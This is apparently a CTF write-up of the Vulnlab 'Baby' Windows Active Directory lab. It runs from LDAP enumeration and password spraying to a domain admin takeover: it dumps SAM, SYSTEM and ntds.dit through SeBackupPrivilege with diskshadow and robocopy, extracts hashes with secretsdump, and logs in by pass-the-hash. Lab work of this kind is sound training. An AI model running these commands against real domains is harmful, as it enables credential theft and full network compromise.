cyberbadgerBABY is a Windows Active Directory machine created by xct in Vulnlab, which involved enumerating Ldap for users and their credentials for initial access. And exploit user privileges “SeBackupPrivilege” to dump the NTDS.dit hash and gain access to the domain controller.
Overview
Active Directory Pentesting
- Baby (Solo, Windows)
- Junior Level Windows Active Directory Machine
- You will learn about LDAP-Enumeration & Windows Privileges
Enumeration
Nmap Scan:
nmap 10.10.96.250 -sCV -min-rate 400-max-retries 130 ↵
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 09:34 EDT
Nmap scan report for 10.10.96.250
Host is up (0.28s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-26 14:34:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-03-26T14:35:07+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-03-25T14:11:32
|_Not valid after: 2025-09-24T14:11:32
|_ssl-date: 2025-03-26T14:35:48+00:00; +1h00m26s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|<em>clock-skew: mean: 1h00m25s, deviation: 0s, median: 1h00m25s
| smb2-security-mode:
| 3:1:1:
|</em> Message signing enabled and required
| smb2-time:
| date: 2025-03-26T14:35:07
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.26 secondsLDAP User Enumeration
With LDAP Enumeration, I found the system users.
ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.96.250" "(objectclass=*)"
ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.96.250" "(objectclass=*)" | grep -i sAMAccountName:
ldap_initialize( ldap://10.10.96.250:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
sAMAccountName: Guest
sAMAccountName: Domain Computers
sAMAccountName: Cert Publishers
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: dev
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: it
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
sAMAccountName: Caroline.Robinson
Using Grep command I found a user credentials in user account description:
ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.96.250" "(objectclass=*)" | grep -i desc
description: Set initial password to BabyStart123!With Kerbrute I verified active users from the list of users I found:
kerbrute -domain baby.vl -users user.txt -dc-ip 10.10.96.250
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Valid user => Ashley.Webb
[*] Valid user => Hugh.George
[*] Valid user => Leonard.Dyer
[*] Valid user => Ian.Walker
[*] Valid user => Connor.Wilkinson
[*] Valid user => Joseph.Hughes
[*] Valid user => Kerry.Wilson
[*] Valid user => Teresa.Bell
[*] Valid user => Caroline.RobinsonSaved the found users in users.txt which I used for password spraying:
crackmapexec smb 10.10.76.62 -u user.txt -p 'BabyStart123!' --continue-on-success
SMB 10.10.76.62 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Jacqueline Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
Caroline.Robinson account requires password change!
Password Change using smbpasswd:
smbpasswd -U caroline.robinson -r 10.10.76.62 1 ↵
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson on 10.10.76.62.I successfully changed caroline’s password:
User: caroline.robinson
Password: Pass123 (new password)
Evil-WinRM:
Using evil-winrm i logged into caroline’s account
evil-winrm -i 10.10.76.62 -u Caroline.Robinson -p 'BabyStart123!' -s /tmp
Exploitation:
Checking the user permissions the user have on domain “whoami /all” the user has the privilege of
SeBackupPrivilege | SeRestorePrivilege.
Designed to enable users to create system backups, this privilege grants full read access to the file system. From an attacker’s viewpoint, exploiting this involves gaining initial access, then elevating to a higher shell to read SAM files and potentially crack passwords of high-privilege users on the system or network.
Evil-WinRM* PS C:\users\Caroline.Robinson\desktop> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Backup Operators:
Carolin is a member of the group, so lets dump the system hashes.
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege
Lets copy sam, system ntds.dit to attacking machine so I can dump the system hashes.
cd c:\
mkdir Temp
cd \Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\systemAfter downloading the files, pypykatz or secretsdump can be used to obtain the administrator hash:
pypykatz registry --sam sam system...Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::However, we cant connect with this hash. Why? It’s actually the local administrator hash which is not useable on a domain controller for logging in! Instead, we have to get the hash of the account in the domain (which has exactly the same name). In order to do this, we have to grab “ntds.dit” aswell using Diskshadow & Robocopy method
Diskshadow & Robocopy
Diskshadow and Robocopy are both windows built-in utilities. Diskshadow creates copies of a currently used drive because we cannot create a copy of running system files, while Robocopy copies files and directories from one location to another.
Let’s Create a script which will create a full backup of C:\ and exposes it as a network drive with the drive letter E:\.
nano script.dshset context persistent nowriters
add volume c: alias caro
create
expose %caro% E:Run unix2dos to make it dos file and upload on server
unix2dos script.dshUsing the evil-winrm upload function, I uploaded the script to the compromised system and retrieved the ntds.dit file:
cd C:\Temp
upload script.dsh
diskshadow /s script.dsh
robocopy /b E:\windows\ntds . ntds.dit
Copy ntds.dit to attack system using the evil-winrm download function and dump the has with sam and system files.
Now we can run secretsdump again, this time getting the domain account hashes by supplying “ntds.dit”:
impacket-secretsdump -ntds ntds.dit -system system local
We can login using the admin hash
evil-winrm -i 10.10.76.62 -u Administrator -H 'ee4457ae59f1e3***********' -s /tmpI got Domain Controller Admin.
VL{9000cab96bcf62e990************}
